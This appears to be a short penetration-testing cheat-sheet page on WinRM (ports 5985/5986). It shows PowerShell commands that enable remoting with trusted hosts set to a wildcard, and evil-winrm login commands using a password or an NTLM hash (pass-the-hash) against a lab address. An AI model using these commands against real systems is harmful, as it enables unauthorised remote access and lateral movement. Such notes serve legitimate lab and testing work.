Powered by

# Port 5985/5986 - WinRM

# Enable WinRM

We need to enable it and add any "victims" as trusted hosts. From an elevated PowerShell prompt, run the following two commands:

Enable-PSRemoting -Force  
Set-Item wsman:\localhost\client\trustedhosts *

# Connect 

# Username + Password
evil-winrm -i 10.10.10.x -u Administrator -p 'KillEmAll!'

# Username Hash
evil-winrm -i 10.10.10.x -u Administrator -H 'NTLM-HASH'

© Copyright 2024. Caue All rights reserved.